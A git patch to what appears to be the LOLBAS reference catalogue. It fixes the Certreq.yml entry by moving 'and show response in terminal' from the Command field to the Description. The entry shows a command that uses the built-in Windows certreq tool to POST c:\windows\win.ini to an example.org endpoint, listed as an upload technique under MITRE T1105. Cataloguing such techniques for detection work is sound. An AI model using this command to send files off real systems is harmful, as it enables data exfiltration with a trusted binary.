From ce53e1376ae6e940d409edd627ca2598845fc43f Mon Sep 17 00:00:00 2001 From: Bjarne <83133360+BjarneVerschorre@users.noreply.github.com> Date: Sat, 17 Feb 2024 18:14:08 +0100 Subject: [PATCH] Moved text to correct line (#349) Moved "and show response in terminal" from `Command` to `Description` --- yml/OSBinaries/Certreq.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 1200042..cd01a66 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -11,8 +11,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal Usecase: Upload Category: Upload Privileges: User